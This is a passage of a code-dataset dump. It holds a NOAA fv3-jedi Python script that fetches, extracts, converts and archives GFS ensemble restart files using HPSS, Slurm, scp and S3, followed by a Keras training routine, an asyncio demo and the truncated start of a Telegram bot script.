384 where there are 384 by 384 per cube face.\n self.ensRes = '384'\n self.ensLev = '64' # Number of vertical levels\n\n self.yamlOrJson = 'yaml'\n\n # String datetimes\n self.dateTime = dt.datetime(1900, 1, 1)\n self.dateTimeRst = dt.datetime(1900, 1, 1)\n self.Y = ''\n self.m = ''\n self.d = ''\n self.H = ''\n self.YRst = ''\n self.mRst = ''\n self.dRst = ''\n self.HRst = ''\n self.YmDRst = ''\n self.YmD_HRst = ''\n\n # Directories\n self.homeDir = ''\n self.rootDir = ''\n self.workDir = ''\n self.dataDir = ''\n self.fv3fDir = ''\n self.trakDir = ''\n self.convertDir = ''\n\n # Section done markers\n self.Working = 'no'\n\n # Tar file for finished product\n self.tarFile = ''\n\n # ------------------------------------------------------------------------------------------------\n\n def cycleTime(self, datetime):\n\n # Set time information for this cycle\n\n self.dateTime = datetime\n\n six_hours = dt.timedelta(hours=6)\n self.dateTimeRst = self.dateTime + six_hours\n\n self.Y = self.dateTime.strftime('%Y')\n self.m = self.dateTime.strftime('%m')\n self.d = self.dateTime.strftime('%d')\n self.H = self.dateTime.strftime('%H')\n self.YRst = self.dateTimeRst.strftime('%Y')\n self.mRst = self.dateTimeRst.strftime('%m')\n self.dRst = self.dateTimeRst.strftime('%d')\n self.HRst = self.dateTimeRst.strftime('%H')\n\n self.YmD = self.Y+self.m+self.d\n self.YmD_H = self.Y+self.m+self.d+\"_\"+self.H\n self.YmDRst = self.YRst+self.mRst+self.dRst\n self.YmD_HRst = self.YRst+self.mRst+self.dRst+\"_\"+self.HRst\n\n print(\"\\n\")\n print(\" Cycle time: \"+self.Y+self.m+self.d+' '+self.H)\n print(\" -----------------------\\n\")\n\n # ------------------------------------------------------------------------------------------------\n\n def abort(self, message):\n\n print('ABORT: '+message)\n os.remove(self.Working)\n raise(SystemExit)\n\n # ------------------------------------------------------------------------------------------------\n\n def setDirectories(self, work_dir, data_dir):\n\n # Setup the work and home directories\n\n self.homeDir = os.getcwd()\n self.dataDir = data_dir\n self.rootDir = work_dir\n self.workDir = os.path.join(\n work_dir, 'enswork_'+self.Y+self.m+self.d+self.H)\n self.trakDir = os.path.join(self.workDir, 'Tracking')\n\n # Create working directory\n if not os.path.exists(self.workDir):\n os.makedirs(self.workDir)\n\n # Create tracking directory\n if not os.path.exists(self.trakDir):\n os.makedirs(self.trakDir)\n\n # Working flag\n self.Working = os.path.join(self.trakDir, 'working')\n\n if (os.path.exists(self.Working)):\n print('ABORT: '+self.Working +\n ' exists. 
Already running or previous fail ...')\n raise(SystemExit)\n\n # Directory for converted members\n self.convertDir = os.path.join(\n self.workDir, self.YRst+self.mRst+self.dRst+'_'+self.HRst)\n\n if not os.path.exists(self.convertDir):\n os.makedirs(self.convertDir)\n\n # Create working file\n pathlib.Path(self.Working).touch()\n\n # Path for fv3files\n self.fv3fDir = os.path.join(self.convertDir, 'fv3files')\n\n # Tar file name for finished product\n self.tarFile = 'ens_'+self.YmD_HRst+'.tar'\n\n print(\" Home directory: \"+self.homeDir)\n print(\" Work directory: \"+self.workDir)\n\n # ------------------------------------------------------------------------------------------------\n\n def finished(self):\n\n # Remove the working flag\n os.remove(self.Working)\n\n # ------------------------------------------------------------------------------------------------\n\n def getEnsembleMembersFromArchive(self):\n\n # Method to get an ensemble member and stage it\n myname = 'getEnsembleMembersFromArchive'\n\n # Check if done\n if utils.isDone(self.trakDir, myname):\n return\n\n # Short cuts\n Y = self.Y\n m = self.m\n d = self.d\n H = self.H\n\n # Move to work directory\n os.chdir(self.workDir)\n\n all_done = True\n\n # Loop over groups of members\n for g in range(self.nGrps):\n\n # File name\n file = ('gpfs_dell1_nco_ops_com_gfs_prod_enkfgdas'\n '.'+Y+m+d+'_'+H+'.enkfgdas_restart_grp'+str(g+1)+'.tar')\n\n # File on hpss\n remote_file = os.path.join(self.hpssRoot+'rh'+Y, Y+m, Y+m+d, file)\n\n print(\" Acquiring \"+remote_file)\n\n # Run hsi ls command on the current file for expected size\n tailfile = \"ls_remote_member.txt\"\n utils.run_bash_command(\n self.workDir, \"hsi ls -l \"+remote_file, tailfile)\n\n # Search tail for line with file size\n remote_file_size = -1\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain(\"rstprod\", fp):\n remote_file_size = line.split()[4]\n os.remove(tailfile)\n\n # Fail if unable to determine remote file size\n if (remote_file_size == -1):\n self.abort('unable to determine size of remote file')\n\n # Logic to determine whether to copy member. 
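The size check above relies on a utils.lines_that_contain helper and on column 5 of an `ls -l`-style listing. A plausible shape for that helper is sketched below (an assumption — the project's real utils module may differ):

def lines_that_contain(substring, fp):
    # yield only the lines of an open file that mention the substring
    return (line for line in fp if substring in line)

# hsi `ls -l` output resembles:  -rw-r--r-- 1 user rstprod 123456 Jan 1 00:00 file.tar
# so line.split()[4] picks out the byte count compared above
size = "-rw-r--r-- 1 user rstprod 123456 Jan 1 00:00 file.tar".split()[4]
print(size)  # '123456'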
Only copied if group\n # - Does not exist at all\n # - The local size does not match remote size, indicating previous copy fail\n\n if (not os.path.exists(file)):\n\n print(\" No attempt to get this member group yet, copying...\")\n get_member_set = True\n\n else:\n\n print(\n \" Member group copy already attempted, checking size matches remote\")\n\n # Git size of the local file\n proc = subprocess.Popen(\n ['ls', '-l', file], stdout=subprocess.PIPE)\n local_file_size = proc.stdout.readline().decode(\n 'utf-8').split()[4]\n\n # If size matches no get required, already staged\n if (local_file_size == remote_file_size):\n print(\" Local size matches remote, not copying again.\")\n get_member_set = False\n else:\n print(\" Remote size \"+str(remote_file_size) +\n \" does not match local size \")\n print(str(local_file_size)+\" copying again.\")\n get_member_set = True\n\n # Copy the file to stage directory\n if (get_member_set):\n print(\" Copyng member group\")\n utils.run_bash_command(self.workDir, \"hsi get \"+remote_file)\n\n # Check that the files are copied properly\n if (not os.path.exists(file)):\n mem_failed = True\n else:\n proc = subprocess.Popen(\n ['ls', '-l', file], stdout=subprocess.PIPE)\n new_local_file_size = proc.stdout.readline().decode(\n 'utf-8').split()[4]\n if (new_local_file_size == remote_file_size):\n mem_failed = False\n else:\n mem_failed = True\n\n if (mem_failed):\n all_done = False\n\n # Create file to indicate this part is done\n if (all_done):\n utils.setDone(self.trakDir, myname)\n\n os.chdir(self.homeDir)\n\n # ------------------------------------------------------------------------------------------------\n\n def checkGfsRestartFiles(self, path):\n\n # Check for expected number of restarts in path\n\n if os.path.exists(path):\n return len(os.listdir(path+'/')) == self.nRstFiles\n else:\n return False\n\n # ------------------------------------------------------------------------------------------------\n\n def extractEnsembleMembers(self):\n\n # Extract each group of ensemble members\n\n myname = 'extractEnsembleMembers'\n\n # Check if done and depends\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'getEnsembleMembersFromArchive')\n\n # Move to work directory\n os.chdir(self.workDir)\n\n all_done = True\n\n # Loop over groups of members\n for g in range(self.nGrps):\n\n # File to extract\n file = ('gpfs_dell1_nco_ops_com_gfs_prod_enkfgdas'\n '.'+self.Y+self.m+self.d+'_'+self.H+'.enkfgdas_restart_grp'+str(g+1)+'.tar')\n print(\" Extracting \"+file)\n\n # Member range for group\n memStart = g*self.nEnsPerGrp+1\n memFinal = g*self.nEnsPerGrp+10\n\n # Check whether extracted files already exist\n do_untar = False\n for e in range(memStart, memFinal+1):\n path_rst = os.path.join(\n 'enkfgdas.'+self.YmD, self.H, 'mem'+str(e).zfill(3), 'RESTART')\n done_mem = self.checkGfsRestartFiles(path_rst)\n if (not done_mem):\n do_untar = True\n\n # Extract file\n if (do_untar):\n utils.run_bash_command(self.workDir, \"tar -xvf \"+file)\n else:\n print(\" Extraction already done\")\n\n # Clean up non-restart files\n for e in range(memStart, memFinal+1):\n files = [os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H, 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.abias'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.abias_air'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.abias_int'),\n os.path.join(self.workDir, 
'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.abias_pc'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.atminc.nc'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.cnvstat'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.gsistat'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.oznstat'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H, 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.radstat')]\n for f in range(len(files)):\n if os.path.exists(files[f]):\n os.remove(files[f])\n\n # Recheck for success\n do_untar = False\n for e in range(memStart, memFinal+1):\n path_rst = os.path.join(\n 'enkfgdas.'+self.YmD, self.H, 'mem'+str(e).zfill(3), 'RESTART')\n done_mem = self.checkGfsRestartFiles(path_rst)\n if (not done_mem):\n do_untar = True\n\n if do_untar:\n all_done = False\n\n # Create file to indicate this part is done\n if (not all_done):\n self.abort(\"extractEnsembleMembers failed\")\n\n # Rename from month to convertDir\n os.rename(os.path.join(self.workDir, 'enkfgdas.' +\n self.YmD, self.H), self.convertDir)\n\n utils.setDone(self.trakDir, myname)\n\n os.chdir(self.homeDir)\n\n # ------------------------------------------------------------------------------------------------\n\n def postExtractEnsembleMembers(self):\n\n myname = 'postExtractEnsembleMembers'\n\n # Check if done and depends\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'extractEnsembleMembers')\n\n removes = ['*sfcanl_data*', '*fv_srf_wnd*',\n '*phy_data*', '*sfc_data*', '*fv_core.res.nc']\n\n # Remove files not needed again\n for e in range(1, self.nEns+1):\n\n for r in range(len(removes)):\n file_list = glob.glob(os.path.join(\n self.convertDir, 'mem'+str(e).zfill(3), 'RESTART', removes[r]))\n for file_path in file_list:\n os.remove(file_path)\n\n # Remove residual directories\n dir = os.path.join(self.workDir, 'enkfgdas.'+self.YmD)\n if os.path.exists(dir):\n shutil.rmtree(dir)\n\n dir = os.path.join(self.workDir, 'tmpnwprd1')\n if os.path.exists(dir):\n shutil.rmtree(dir)\n\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def removeEnsembleArchiveFiles(self):\n\n # Remove tar files obtained from the arhcive\n\n # Check if done and depends\n myname = 'removeEnsembleArchiveFiles'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'postExtractEnsembleMembers')\n\n # Loop over groups of members\n for g in range(self.nGrps):\n\n # File to extract\n file = ('gpfs_dell1_nco_ops_com_gfs_prod_enkfgdas'\n '.'+self.Y+self.m+self.d+'_'+self.H+'.enkfgdas_restart_grp'+str(g+1)+'.tar')\n\n pathfile = os.path.join(self.workDir, file)\n\n # Remove the file\n if os.path.exists(pathfile):\n print(\" Removing \"+pathfile)\n os.remove(pathfile)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def __preparefv3Files(self):\n\n # First remove fv3files path if it exists\n if os.path.exists(self.fv3fDir):\n shutil.rmtree(self.fv3fDir)\n\n # Copy from the user provided Data directory\n shutil.copytree(os.path.join(self.dataDir, 'fv3files'), self.fv3fDir)\n\n # Update input.nml for this run\n nml_in = 
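Several steps above shell out through utils.run_bash_command(dir, cmd[, tailfile]). A minimal sketch of what such a wrapper could look like (an assumption, not the project's actual implementation):

import os
import subprocess

def run_bash_command(cwd, command, tailfile=None):
    # run the command in the given directory, merging stderr into stdout
    out = subprocess.run(command, shell=True, cwd=cwd,
                         stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout
    if tailfile is not None:
        # keep the output so callers can grep it, as getEnsembleMembersFromArchive does
        with open(os.path.join(cwd, tailfile), "wb") as f:
            f.write(out)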
open(os.path.join(self.fv3fDir, 'input.nml_template')).read()\n nml_in = nml_in.replace('NPX_DIM', str(int(self.ensRes)+1))\n nml_in = nml_in.replace('NPY_DIM', str(int(self.ensRes)+1))\n nml_in = nml_in.replace('NPZ_DIM', self.ensLev)\n nml_in = nml_in.replace('NPX_PROC', self.nProcNx)\n nml_in = nml_in.replace('NPY_PROC', self.nProcNy)\n nml_out = open(os.path.join(self.fv3fDir, 'input.nml'), 'w')\n nml_out.write(nml_in)\n nml_out.close()\n\n # ------------------------------------------------------------------------------------------------\n\n # Dictionary for converting a state to psi/chi\n\n def __convertStatesDict(self, varchange='id', output_name=''):\n\n # Geometry\n inputresolution = modconf.geometry_dict('inputresolution', 'fv3files')\n outputresolution = modconf.geometry_dict(\n 'outputresolution', 'fv3files')\n\n # Variable change\n if (varchange == 'a2c'):\n varcha = modconf.varcha_a2c_dict('fv3files')\n else:\n varcha = modconf.varcha_id_dict(\n [\"u\", \"v\", \"T\", \"DELP\", \"sphum\", \"ice_wat\", \"liq_wat\", \"o3mr\", \"phis\"])\n\n input = {}\n output = {}\n\n dict_states = {}\n dict_states[\"states\"] = []\n\n for e in range(1, self.nEns+1):\n\n path_mem_in = 'mem'+str(e).zfill(3)+'/RESTART/'\n path_mem_out = 'mem'+str(e).zfill(3)+'/'\n\n # Input/output for member\n input = modconf.state_dict('input', path_mem_in, self.dateTimeRst)\n output = modconf.output_dict('output', path_mem_out, output_name)\n inputout = {**input, **output}\n\n dict_states[\"states\"].append(inputout)\n\n return {**inputresolution, **outputresolution, **varcha, **dict_states}\n\n # ------------------------------------------------------------------------------------------------\n\n def prepare2Convert(self):\n\n # Prepare directories for the members and the configuration files\n\n # Check if done and depends\n myname = 'prepare2Convert'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'removeEnsembleArchiveFiles')\n\n self.__preparefv3Files()\n\n # Create the config files\n csdict = self.__convertStatesDict('a2c', '')\n\n # Write dictionary to config file\n conf_file = os.path.join(\n self.convertDir, 'convert_states.'+self.yamlOrJson)\n with open(conf_file, 'w') as outfile:\n if self.yamlOrJson == 'yaml':\n yaml.dump(csdict, outfile, default_flow_style=False)\n elif self.yamlOrJson == 'json':\n json.dump(csdict, outfile)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n # Submit MPI job that converts the ensemble members\n\n def convertMembersSlurm(self, machine, nodes, taskspernode, hours, jbuild):\n\n # Check if done and depends\n myname = 'convertMembersSlurm'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'prepare2Convert')\n\n # Number of processors for job\n nprocs = str(6*int(self.nProcNx)*int(self.nProcNy))\n\n # Filename\n fname = os.path.join(self.convertDir, 'run.sh')\n\n # Job ID\n jobid = randint(1000000, 9999999)\n jobnm = \"convertstates.\"+str(jobid)\n\n # Hours\n hh = str(hours).zfill(2)\n\n # Bash shell script that runs through all members\n fh = open(fname, \"w\")\n fh.write(\"#!/bin/bash\\n\")\n fh.write(\"\\n\")\n\n fh.write(\"#SBATCH --export=NONE\\n\")\n fh.write(\"#SBATCH --job-name=\"+jobnm+\"\\n\")\n fh.write(\"#SBATCH --output=\"+jobnm+\".log\\n\")\n if machine == 'discover':\n fh.write(\"#SBATCH --partition=compute\\n\")\n fh.write(\"#SBATCH --account=g0613\\n\")\n 
fh.write(\"#SBATCH --qos=advda\\n\")\n elif machine == 'hera':\n fh.write(\"#SBATCH --account=da-cpu\\n\")\n fh.write(\"#SBATCH --nodes=\"+str(nodes)+\"\\n\")\n fh.write(\"#SBATCH --ntasks-per-node=\"+str(taskspernode)+\"\\n\")\n fh.write(\"#SBATCH --time=\"+hh+\":00:00\\n\")\n\n fh.write(\"\\n\")\n\n fh.write(\"source /usr/share/modules/init/bash\\n\")\n fh.write(\"module purge\\n\")\n if machine == 'discover':\n fh.write(\n \"module use -a /discover/nobackup/projects/gmao/obsdev/rmahajan/opt/modulefiles\\n\")\n fh.write(\"module load apps/jedi/intel-17.0.7.259\\n\")\n elif machine == 'hera':\n fh.write(\n \"module use -a /scratch1/NCEPDEV/da/Daniel.Holdaway/opt/modulefiles/\\n\")\n fh.write(\"module load apps/jedi/intel-19.0.5.281\\n\")\n fh.write(\"module list\\n\")\n\n fh.write(\"\\n\")\n fh.write(\"cd \"+self.convertDir+\"\\n\")\n fh.write(\"\\n\")\n #fh.write(\"export OOPS_TRACE=1\\n\")\n fh.write(\"export build=\"+jbuild+\"\\n\")\n fh.write(\"mpirun -np \"+nprocs +\n \" $build/bin/fv3jedi_convertstate.x convert_states.\"+self.yamlOrJson+\"\\n\")\n fh.write(\"\\n\")\n fh.close()\n\n # Submit job\n os.chdir(self.convertDir)\n utils.run_bash_command(self.convertDir, \"sbatch \"+fname)\n os.chdir(self.homeDir)\n\n # Wait for finish\n print(\" Waiting for sbatch job to finish\")\n\n done_convert = False\n print_job = True\n while not done_convert:\n\n proc = subprocess.Popen(\n ['squeue', '-l', '-h', '-n', jobnm], stdout=subprocess.PIPE)\n squeue_res = proc.stdout.readline().decode('utf-8')\n\n if print_job:\n print(\" Slurm job info: \")\n print(squeue_res)\n print_job = False\n\n if squeue_res is '':\n done_convert = True\n print(' Slurm job is finished, checking for success...')\n break\n\n # If not finished wait another minute\n time.sleep(60)\n\n # Grep for success\n with open(jobnm+'.log', \"r\") as fp:\n for line in fp:\n if re.search(\"status = 0\", line):\n print(' convertMembersSlurm finished successfully')\n else:\n self.abort(\"convertMembersSlurm failed. 
Job name: \"+jobnm)\n\n # Remove slurm job script\n os.remove(fname)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def postConvertCleanUp(self):\n\n # Clean up large files\n\n # Check if done and depends\n myname = 'postConvertCleanUp'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'convertMembersSlurm')\n\n # Remove restart directories\n for e in range(1, self.nEns+1):\n\n path_mem_in = os.path.join(\n self.convertDir, 'mem'+str(e).zfill(3), 'RESTART')\n shutil.rmtree(path_mem_in)\n\n # Clean up convert directory\n shutil.rmtree(os.path.join(self.convertDir, 'fv3files'))\n os.remove(os.path.join(self.convertDir, 'logfile.000000.out'))\n\n # Clean up work directory\n shutil.rmtree(os.path.join(self.workDir, 'enkfgdas.'+self.YmD))\n\n # Need to tar again\n os.remove(os.path.join(self.trakDir, 'tarWorkDirectory'))\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def tarWorkDirectory(self):\n\n # Check if done and depends\n myname = 'tarWorkDirectory'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'removeEnsembleArchiveFiles')\n\n # Avoid absolute paths in tar file\n os.chdir(self.rootDir)\n\n if not os.path.exists(os.path.join(self.tarFile)):\n utils.run_bash_command(\n self.rootDir, \"tar -cvf \"+self.tarFile+\" \"+\"enswork_\"+self.Y+self.m+self.d+self.H)\n else:\n print(\" Tar file for converted members already created\")\n\n # Search tail for line with file size\n for e in range(1, self.nEns+1):\n\n # Check tarring process worked\n filesearch = os.path.join('enswork_'+self.Y+self.m+self.d+self.H, self.YmD_HRst, 'mem'+str(\n e).zfill(3), 'RESTART', self.YRst+self.mRst+self.dRst+'.'+self.HRst+'0000.fv_core.res.tile1.nc')\n\n tailfile = \"tar_check.txt\"\n utils.run_bash_command(\n self.rootDir, \"tar -tvf \"+self.tarFile+\" \"+filesearch, tailfile, 'no')\n\n filesearch_found = ''\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain('failure', fp):\n filesearch_found = line\n os.remove(tailfile)\n\n # Abort if the check fails\n if filesearch_found != '':\n self.abort('tarWorkDirectory failed:, ' +\n filesearch+' not found in tar file.')\n\n os.chdir(self.homeDir)\n\n # Remove the convertdir directory\n shutil.rmtree(self.convertDir)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def membersFromHera(self):\n\n # Check if done and depends\n myname = 'membersFromHera'\n if utils.isDone(self.trakDir, myname):\n return True\n\n # Move to root directory\n os.chdir(self.rootDir)\n\n hera_path = os.path.join('/scratch1', 'NCEPDEV', 'da',\n 'Daniel.Holdaway', 'JediWF', 'StaticB', 'wrk', self.tarFile)\n tailfile = os.path.join(self.workDir, \"ls_hera_tar.txt\")\n utils.run_bash_command(\n self.workDir, \"ssh Daniel.Holdaway@dtn-hera.fairmont.rdhpcs.noaa.gov ls -l \"+hera_path, tailfile)\n\n # Search tail for line with file size\n hera_file_size = -1\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain(self.tarFile, fp):\n print(line)\n hera_file_size = line.split()[4]\n os.remove(tailfile)\n\n if hera_file_size == -1:\n print(\" This date/time not available on Hera yet\")\n return False\n\n # Check if copy already attempted\n 
disc_file_size = -1\n if (os.path.exists(self.tarFile)):\n proc = subprocess.Popen(\n ['ls', '-l', self.tarFile], stdout=subprocess.PIPE)\n disc_file_size = proc.stdout.readline().decode('utf-8').split()[4]\n\n # If not matching in file size copy\n if not hera_file_size == disc_file_size:\n print(' Copying:')\n tailfile = os.path.join(self.workDir, \"scp_hera_tar.txt\")\n utils.run_bash_command(\n self.workDir, \"scp Daniel.Holdaway@dtn-hera.fairmont.rdhpcs.noaa.gov:\"+hera_path+\" ./\", tailfile)\n os.remove(tailfile)\n\n # Check copy was successful\n disc_file_size = -1\n if (os.path.exists(self.tarFile)):\n proc = subprocess.Popen(\n ['ls', '-l', self.tarFile], stdout=subprocess.PIPE)\n disc_file_size = proc.stdout.readline().decode('utf-8').split()[4]\n\n if not hera_file_size == disc_file_size:\n self.abort(' In copying from hera there\\'s a size discrepancy')\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n os.chdir(self.homeDir)\n\n return True\n\n # ------------------------------------------------------------------------------------------------\n\n # Untar the converted members\n\n def extractWorkDirectory(self):\n\n myname = 'extractWorkDirectory'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'membersFromHera')\n\n # Move to work directory\n os.chdir(self.workDir)\n\n tailfile = \"untar_converted_members.txt\"\n utils.run_bash_command(\n self.workDir, \"tar -xvf \"+self.tarFile, tailfile)\n\n # Move to root directory\n os.chdir(self.homeDir)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n # Untar the converted members\n\n def extractWorkDirectoryDisco(self):\n\n myname = 'extractWorkDirectoryDisco'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'membersFromHera')\n\n # Move to work directory\n os.chdir(self.workDir)\n\n tailfile = \"untar_converted_members.txt\"\n utils.run_bash_command(\n self.workDir, \"tar -xvf \"+self.tarFile, tailfile)\n\n # Move to root directory\n os.chdir(self.homeDir)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def ship2S3(self, s3path):\n\n myname = 'ship2S3'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'tarWorkDirectory')\n\n file2ship = os.path.join(self.rootDir, self.tarFile)\n\n s3file = os.path.join(s3path, self.tarFile)\n\n # File size locally\n local_file_size = -1\n if (os.path.exists(file2ship)):\n proc = subprocess.Popen(\n ['ls', '-l', file2ship], stdout=subprocess.PIPE)\n local_file_size = proc.stdout.readline().decode('utf-8').split()[4]\n\n # File size on S3\n tailfile = os.path.join(self.workDir, \"ls_remote_file.txt\")\n utils.run_bash_command(self.workDir, \"aws2 s3 ls \"+s3file, tailfile)\n\n remote_file_size = -1\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain(self.tarFile, fp):\n remote_file_size = line.split()[2]\n os.remove(tailfile)\n\n if local_file_size != remote_file_size:\n\n # Copy file to S3\n utils.run_bash_command(\n self.workDir, \"aws2 s3 cp \"+file2ship+\" \"+s3file)\n\n # Recheck File size on S3\n tailfile = os.path.join(self.workDir, \"ls_remote_file.txt\")\n utils.run_bash_command(\n self.workDir, \"aws2 s3 ls \"+s3file, tailfile)\n\n remote_file_size = -1\n with open(tailfile, \"r\") as fp:\n for line in 
utils.lines_that_contain(self.tarFile, fp):\n remote_file_size = line.split()[2]\n os.remove(tailfile)\n\n # Fail if not matching\n if local_file_size != remote_file_size:\n self.abort(\"Local size does not match S3 size\")\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n","repo_name":"JoshuaFu-NOAA/fv3-jedi-tools","sub_path":"src/fv3jeditools/ConvertEnsemble/gfs_ens_proc.py","file_name":"gfs_ens_proc.py","file_ext":"py","file_size_in_byte":30976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16906346337","text":"from common.logger import logger\nfrom common import filesystem, utils\nfrom machine.training.lib import image_utils\nfrom machine.training.lib.image_generator import image_data_generation\nfrom machine.training.lib.custom_model import custom_model\nfrom keras import optimizers\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping,TensorBoard\n\n\n\nimport os\nlogger.initialize()\n\n\ndef base_category_training(_Train_Common_Params, epoch_factor=50):\n \"\"\"\n Common categorizing Training\n :param _Train_Common_Params: Class for Model Training, Inlucing sub-clases\n :return:\n \"\"\"\n logger.info(\"Training Start\")\n\n _Model_Selection_Params = _Train_Common_Params.i_Model_Selection_Params\n _Dataset_Path = _Train_Common_Params.i_Dataset_Path\n _Generator_Params = _Train_Common_Params.i_Generator_Params\n _Results_Path_Params = _Train_Common_Params.i_Results_Path_Params\n _Training_Params = _Train_Common_Params.i_Training_Params\n\n logger.info(\"Check Class Number for categorizing\")\n __train_path = _Dataset_Path.training_path\n __folders = filesystem.get_folders(__train_path)\n __class_number = len(__folders)\n logger.debug(\"Category Number is : \" + str(__class_number))\n\n logger.info(\"Generating Input shape and train/validation dataset\")\n __input_shape = image_utils.image_input_shape(_Generator_Params)\n __train_generator, __validation_generator, __test_generator, __class_generator = image_data_generation(_Dataset_Path, _Generator_Params)\n logger.debug(\"Check Classes : \" + str(__class_generator))\n\n logger.debug(\"Check Train data_generator \")\n __base_path = _Results_Path_Params.base_path\n\n logger.info(\"Result and tensor log path Setup\")\n __top_weight_path = _Results_Path_Params.top_weight_path\n __result_weight_path = _Results_Path_Params.result_weight_path\n __tensor_log_path = _Results_Path_Params.tensor_log_path\n\n _Model_Selection_Params.set(__input_shape, __class_number, _Generator_Params.width, _Generator_Params.height)\n\n __model = custom_model(_Model_Selection_Params)\n if __model is None:\n logger.warning(\"Not available Model options\")\n return False\n\n # plot_model(__model, to_file='model.png')\n __optimizer = optimizers.RMSprop()\n # __optimizer = keras.optimizers.Adam()\n __model.compile(optimizer=__optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\n\n logger.debug(\"Loaded Model Type\")\n logger.debug(str(__model.summary()))\n\n __model_name = utils.file_name_generator(identification='result', title='model', extension='png')\n __model_image_path = os.path.join(__base_path, __model_name)\n\n logger.debug(\"Add CallbackList\")\n __callbacks_list = [\n ModelCheckpoint(__top_weight_path, monitor='val_acc', verbose=1, save_best_only=True),\n EarlyStopping(monitor='val_acc', patience=80, verbose=0),\n TensorBoard(log_dir=__tensor_log_path, 
histogram_freq=0, write_graph=True, write_images=True)\n ]\n\n __batch_size = _Generator_Params.batch_size\n\n _Training_Params.set(batch_size=__batch_size, train_data=__train_generator, validation_data=__validation_generator)\n\n logger.info(\"Generating and Fitting Model for training\")\n __history_transfer = __model.fit_generator(_Training_Params.train_data,\n epochs=_Training_Params.epoch,\n steps_per_epoch=_Training_Params.steps_per_epoch // epoch_factor,\n validation_data=_Training_Params.validation_data,\n validation_steps=_Training_Params.validation_steps // epoch_factor,\n callbacks=__callbacks_list,\n workers=_Training_Params.workers)\n\n logger.debug(\"Save Final Training Values\")\n __model.save(__result_weight_path)\n\n # logger.debug(\"Save History as Plot\")\n # __history_name = utils.file_name_generator(identification='result', title='histogram', extension='png')\n # __history_log_path = os.path.join(__base_path, __history_name)\n # history_save(__history_transfer, __history_log_path)\n\n scores = __model.evaluate_generator(__test_generator,\n steps=_Training_Params.validation_steps // epoch_factor,\n use_multiprocessing=False)\n logger.info(\"Accuracy: %.2f%%\" % (scores[1] * 100))\n logger.debug(\"Training End\")\n\n return True\n","repo_name":"sulpago/ML-Demo-Site","sub_path":"machine/machine_teacher.py","file_name":"machine_teacher.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10049560633","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @File: async_demo.py\n# @Author: dell\n# @Date: 2020/10/26 16:08\n# @Desc: \n# @Project: licode\n# @Source: PyCharm\n\n\nimport asyncio\nimport threading\n\n\nasync def hello():\n print('Hello world! (%s)' % threading.currentThread())\n await asyncio.sleep(1)\n print('Hello again! (%s)' % threading.currentThread())\n\n\nloop = asyncio.get_event_loop()\n\ntasks = [hello(), hello()]\n\nloop.run_until_complete(asyncio.wait(tasks))\n\nloop.close()","repo_name":"freechenh/licode","sub_path":"day15/async_demo.py","file_name":"async_demo.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74300639091","text":"import telebot\nimport sqlite3\nfrom telebot import types\n\nbot = 